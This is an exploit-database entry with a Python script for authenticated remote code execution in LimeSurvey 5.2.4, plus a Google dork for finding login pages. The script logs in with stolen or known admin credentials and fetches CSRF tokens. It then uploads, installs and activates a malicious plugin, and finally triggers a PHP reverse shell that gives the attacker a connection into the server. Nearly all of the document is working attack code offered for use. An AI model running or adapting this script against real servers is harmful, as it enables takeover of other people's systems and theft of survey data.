Exploit for LimeSurvey 5.2.4 Remote Code Execution

## https://sploitus.com/exploit?id=PACKETSTORM:165212
# Exploit Title: LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated)  
# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login  
# Date: 05/12/2021  
# Exploit Author: Y1LD1R1M  
# Vendor Homepage: https://www.limesurvey.org/  
# Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip  
# Version: 5.2.x  
# Tested on: Kali Linux 2021.3  
# Reference: https://github.com/Y1LD1R1M-1337/Limesurvey-RCE  
  
#!/usr/bin/python  
# -*- coding: utf-8 -*-  
  
  
import requests  
import sys  
import warnings  
from bs4 import BeautifulSoup  
  
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')  
print("_______________LimeSurvey RCE_______________")  
print("")  
print("")  
print("Usage: python exploit.py URL username password port")  
print("Example: python exploit.py http://192.26.26.128 admin password 80")  
print("")  
print("")  
print("== ██╗ ██╗ ██╗██╗ ██████╗ ██╗██████╗ ██╗███╗ ███╗ ==")  
print("== ╚██╗ ██╔╝███║██║ ██╔══██╗███║██╔══██╗███║████╗ ████║ ==")  
print("== ╚████╔╝ ╚██║██║ ██║ ██║╚██║██████╔╝╚██║██╔████╔██║ ==")  
print("== ╚██╔╝ ██║██║ ██║ ██║ ██║██╔══██╗ ██║██║╚██╔╝██║ ==")  
print("== ██║ ██║███████╗██████╔╝ ██║██║ ██║ ██║██║ ╚═╝ ██║ ==")  
print("== ╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ==")  
print("")  
print("")  
url = sys.argv[1]  
username = sys.argv[2]  
password = sys.argv[3]  
port = sys.argv[4]  
  
req = requests.session()  
print("[+] Retrieving CSRF token...")  
loginPage = req.get(url+"/index.php/admin/authentication/sa/login")  
response = loginPage.text  
s = BeautifulSoup(response, 'html.parser')  
CSRF_token = s.findAll('input')[0].get("value")  
print(CSRF_token)  
print("[+] Sending Login Request...")  
  
login_creds = {  
"user": username,  
"password": password,  
"authMethod": "Authdb",  
"loginlang":"default",  
"action":"login",  
"width":"1581",  
"login_submit": "login",  
"YII_CSRF_TOKEN": CSRF_token  
}  
print("[+]Login Successful")  
print("")  
print("[+] Upload Plugin Request...")  
print("[+] Retrieving CSRF token...")  
filehandle = open("/root/limesurvey/plugin/Y1LD1R1M.zip",mode = "rb") # CHANGE THIS  
login = req.post(url+"/index.php/admin/authentication/sa/login" ,data=login_creds)  
UploadPage = req.get(url+"/index.php/admin/pluginmanager/sa/index")  
response = UploadPage.text  
s = BeautifulSoup(response, 'html.parser')  
CSRF_token2 = s.findAll('input')[0].get("value")  
print(CSRF_token2)  
Upload_creds = {  
"YII_CSRF_TOKEN":CSRF_token2,  
"lid":"$lid",  
"action": "templateupload"  
}  
file_upload= req.post(url+"/index.php/admin/pluginmanager?sa=upload",files = {'the_file':filehandle},data=Upload_creds)  
UploadPage = req.get(url+"/index.php/admin/pluginmanager?sa=uploadConfirm")  
response = UploadPage.text  
print("[+] Plugin Uploaded Successfully")  
print("")  
print("[+] Install Plugin Request...")  
print("[+] Retrieving CSRF token...")  
  
InstallPage = req.get(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin")  
response = InstallPage.text  
s = BeautifulSoup(response, 'html.parser')  
CSRF_token3 = s.findAll('input')[0].get("value")  
print(CSRF_token3)  
Install_creds = {  
"YII_CSRF_TOKEN":CSRF_token3,  
"isUpdate": "false"  
}  
file_install= req.post(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin",data=Install_creds)  
print("[+] Plugin Installed Successfully")  
print("")  
print("[+] Activate Plugin Request...")  
print("[+] Retrieving CSRF token...")  
ActivatePage = req.get(url+"/index.php/admin/pluginmanager?sa=activate")  
response = ActivatePage.text  
s = BeautifulSoup(response, 'html.parser')  
CSRF_token4 = s.findAll('input')[0].get("value")  
print(CSRF_token4)  
Activate_creds = {  
"YII_CSRF_TOKEN":CSRF_token4,  
"pluginId": "1" # CHANGE THIS  
}  
file_activate= req.post(url+"/index.php/admin/pluginmanager?sa=activate",data=Activate_creds)   
print("[+] Plugin Activated Successfully")  
print("")  
print("[+] Reverse Shell Starting, Check Your Connection :)")  
shell= req.get(url+"/upload/plugins/Y1LD1R1M/php-rev.php") # CHANGE THIS